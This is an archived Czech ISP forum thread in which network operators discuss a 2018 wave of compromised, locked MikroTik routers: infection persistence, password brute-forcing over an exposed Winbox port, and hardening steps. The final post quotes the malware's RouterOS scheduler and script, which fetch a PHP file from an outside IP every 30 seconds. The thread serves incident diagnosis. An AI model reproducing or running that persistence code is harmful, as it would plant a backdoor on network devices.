❗️Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz

MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Návody a problémy s konfigurací.
Dalibor Toman
Příspěvky: 1246
Registrován: 12 years ago

Re: MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Příspěvekod Dalibor Toman » 7 years ago

co je to za typ RB? Alespon architektura. MIPSBE?
0 x

Sidi
Příspěvky: 510
Registrován: 9 years ago

Příspěvekod Sidi » 7 years ago

Dalibor Toman píše:co je to za typ RB? Alespon architektura. MIPSBE?

912, routovaná síť, tohle konkrétně je bridge (horn sektor). Zatím jedinej napadenej.
0 x

kodlkal
Příspěvky: 33
Registrován: 12 years ago

Příspěvekod kodlkal » 7 years ago

3com píše:
mpcz píše:
3com píše:Jestli máš v ruce nějaké ty loginy a hesla z toho minulého ''zamykače'' tak pošli zkusím.

Tak jednoduché to není. Pokud mi ale pošleš jeden zamklý stroj a nebude to nějaká nová neznámá kompletní mutace, heslo a login ti pošlu. Může v něm být i poslední verze ROS, tzv. bezpečná. Předpokládám, že pokud se to podaří, vše proběhlo dle stejného scénáře, heslo bude fungovat i do toho zbytku zamklých. Být tebou, tak neváhám, útočník má kompletní přístup do tvé sítě, je dokonce schopen odchytávat data z emailů, hesla atd. mpcz, 25.7.2018


Odkud jste vojáku? Kdyby to bylo v mém dostřelu klidně to dovezu osobně pro analýzu :sunglasses:

Připojuji se, dovezu taky jeden!
0 x

Uživatelský avatar
hapi
Příspěvky: 12989
Registrován: 18 years ago

Příspěvekod hapi » 7 years ago

vezete nakažený rbčka někomu kdo nedavno přišel na to že unix má jiný konce řádků v textu? jo to má smysl :-D
0 x
Supermicro + Mikrotik = SuperTik
high speed routery podle požadavků

Uživatelský avatar
hapi
Příspěvky: 12989
Registrován: 18 years ago

Příspěvekod hapi » 7 years ago

Sidi píše:
hapi píše:
the.max píše:Nenapadla už někoho taková kacířská myšlenka, že do ROSu existuje nějaké univerzální heslo, které si tam zadrátovali přímo v Mikrotiku? Nebyli by první, ani poslední. Tím by se dalo vysvětlit to, proč se to šíří i na 'bezpečných' verzích.


žádný tam není, jestli si čet něco s těch odkazů co už tu jsou 2x tak to někdo opravdu hodně pitval a nic tam není.

Nikdo zatím nepotvrdil nákazu na posledních verzí. Jenom něco vyštěk a nepotvrdil.

Minulý týden aktualizovaný RB na 6.42.5, změněno heslo, máme změněné i uživatelské jméno. Tento týden napaden, nemá veřejnou IP.


tak už nejspíš nakažený bylo ne?
0 x
Supermicro + Mikrotik = SuperTik
high speed routery podle požadavků

Dalibor Toman
Příspěvky: 1246
Registrován: 12 years ago

Příspěvekod Dalibor Toman » 7 years ago

hapi píše:
tak už nejspíš nakažený bylo ne?


myslis jako, ze infekce prezila upgrade ROSu?
0 x

Uživatelský avatar
hapi
Příspěvky: 12989
Registrován: 18 years ago

Příspěvekod hapi » 7 years ago

jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?
0 x
Supermicro + Mikrotik = SuperTik
high speed routery podle požadavků

mpcz
Příspěvky: 2779
Registrován: 19 years ago

Příspěvekod mpcz » 7 years ago

Možná asi jde o to, co to je infekce, že. Co tu mám různé vzorky, tak virus úmyslně upgraduje ROS na "nenapadnutelnou" verzi za účelem neprozrazení nasazených záškodnických funkcí a komunikačních kanálů. Běžné funkce ROS, které si tam virus nasadí upgrade přežijí v pohodě, proč taky ne. Druhou partition jsem v odemklých strojích neviděl ani jednou, čímž rozhodně nechci říci, že nemůže existovat. mpcz, 27.7.2018
Naposledy upravil(a) mpcz dne 27 Jul 2018 16:15, celkem upraveno 1 x.
0 x

Dalibor Toman
Příspěvky: 1246
Registrován: 12 years ago

Příspěvekod Dalibor Toman » 7 years ago

hapi píše:jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?

aby prezil a aktivoval se kod v ukryte partition pak by bud
1) mikrotik musel aktivne z takovych partition neco spoustet - tj prolezt vsechny partitions a neco spoustet. Ne ze by me to na zaklade zverejnenych chyb nejak prekvapilo, ale cekal bych ze v novejsich ROSech takove prasarny odstavi
2) z te nove partition by to muselo bootovat. Cili bud by ten virus musel jeste zmenit poradi bootovani nebo zase nejake pekna featura od MT

zatim jsem nikde nevidel, ze by tohle nekdo potvrdil.
0 x

Uživatelský avatar
hapi
Příspěvky: 12989
Registrován: 18 years ago

Příspěvekod hapi » 7 years ago

to byla řečnická otázka
0 x
Supermicro + Mikrotik = SuperTik
high speed routery podle požadavků

mpcz
Příspěvky: 2779
Registrován: 19 years ago

Příspěvekod mpcz » 7 years ago

hapi píše:vezete nakažený rbčka někomu kdo nedavno přišel na to že unix má jiný konce řádků v textu? jo to má smysl :-D

Pan kolega Hapi má svatou pravdu. Celý problém tajemství útočníka a neproniknutelnosti kódu se totiž skrývá v posledních bajtech každého řádku příkazu/textu Linuxu. Pošli zamklé stroje jemu, ušetříš za poštovné a odemknutí máš aspoň jisté, což u mě rozhodně nehrozí. mpcz, 27.7.2018
0 x

ludvik
Příspěvky: 4448
Registrován: 14 years ago

Příspěvekod ludvik » 7 years ago

Pokud se to nechová jako bootvirus. Je tedy otázkou, zda i PPC/ARM/MIPS/TILE bootuje stejně jako x86 ... ale pokud, tak MBR asi obyčejný install nepřepisuje.
Ale celá tato konstrukce mi přijde hodně přes čáru.
Dalibor Toman píše:
hapi píše:jasně, na co si to tam asi vytváří hide partition? Proč je doporučeno to vzít netinstalem?

aby prezil a aktivoval se kod v ukryte partition pak by bud
1) mikrotik musel aktivne z takovych partition neco spoustet - tj prolezt vsechny partitions a neco spoustet. Ne ze by me to na zaklade zverejnenych chyb nejak prekvapilo, ale cekal bych ze v novejsich ROSech takove prasarny odstavi
2) z te nove partition by to muselo bootovat. Cili bud by ten virus musel jeste zmenit poradi bootovani nebo zase nejake pekna featura od MT

zatim jsem nikde nevidel, ze by tohle nekdo potvrdil.
0 x
Jelikož je zde zakázáno se negativně vyjadřovat k provozním záležitostem, tak se holt musím vyjádřit takto: nové fórum tak jak je připravováno považuji za cestu do pekel. Nepřehledný maglajz z toho bude. Do podpisu se mi pozitiva již nevejdou.

Uživatelský avatar
3com
Příspěvky: 627
Registrován: 14 years ago

Příspěvekod 3com » 7 years ago

Tak co lajdáci už někdo přišel na to jaký ten virus dal login a heslo? ) U nás po třech dnech nespání a rekonfiguraci/upgrade ROS tisíce jednotek je bez přístupu 88 klientských strojů na veřejných IP co byly přístupné z naší blbosti na portu 8291. Všechny nepřístupné jsou ty co měly jednoduché heslo v anglickém jazyce.... Vysílací antény cca 200ks měly heslo v českém jazyce + číslo a zde infekce neproniknula ani na jeden ikdyž měly stejnou konfiguraci a verzi ROS stejnou 6.31.3. Tudis vidím to na brutalforce uhodnutí hesla... Jako protiakce byl zablokován port 8291 z internetu a od té doby už nikde není žádný pokus o login v logu žádného stroje... Omg školácká chyba....
0 x

mpcz
Příspěvky: 2779
Registrován: 19 years ago

Příspěvekod mpcz » 7 years ago

Je to jen můj odhad kolemjdoucího, ale nezdá se mi, že by se někdo dneska zdržoval hádáním hesla. Jednak to zbytečně zdržuje a dlouhé procesy jsou dobře zachytitelné. Jinak - zachytil někdo někdy tento hádací proces na svojem stroji? Samozřejmě vylučuji ty jednoduché slovníkové zkoušky na ustálené user/password, které předpokládám správce tak velké sítě nepoužil.
K té otázce - za lajdáka se nemám, ale ano, heslo se dá ze zamklého stroje vylomit a použít na odemknutí ostatních strojů.
Je jasné, že tyto problémy jsou způsobeny především leností/není čas/třeba se nám to vyhne, protože ručně upgradovat tisíce strojů je docela fuška. Zatím co mám rozdělanou betaverzi "aut. upgradátoru", funguje pouze tento stav:
udělá upgrade ROS
udělá upgrade bios
blokne všechny porty kromě winboxu
změní port na určených nebloklých services
změní heslo
zamkne přístup jen z určitých adres
přidá do FW nebo jinam pár řádků
Zatím to funguje dobře, jen je asi potřeba popřemýšlet a promyslet pořadí příkazů, než to oběhá celou síť, chvilku to trvá. Ty upgrade zdržují a vyžadují opatrost v načasování. Pokud by někdo viděl další potřebu, nechť se třeba ozve, je lepší to udělat hned, pozdější rýpání do SW je o dost pracnější.
Je to zatím dost jednoduché, ale pro malinkou síť a skromné potřeby to udělá vše, co je třeba nyní udělat. mpcz, 28.7.2018
0 x

K3NY
Příspěvky: 442
Registrován: 9 years ago

Příspěvekod K3NY » 6 years ago

nezaznamenali jste od 30.7 zvyseny pocet odeslanych emailu od zakazniku?
aktualne pozoruji ze vsichni s Mk maji

Kód: Vybrat vše

/system scheduleradd interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup/system scriptadd name=script3_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
a ve files: mikrotik.php

ip adresa pouzivaji 95.154.216.164-165-166
bezi to i na MK s 6.40.6, problemy jsem zatim nezaznamenal na MK s 6.40.8, ale je to zatim prvni dojem
0 x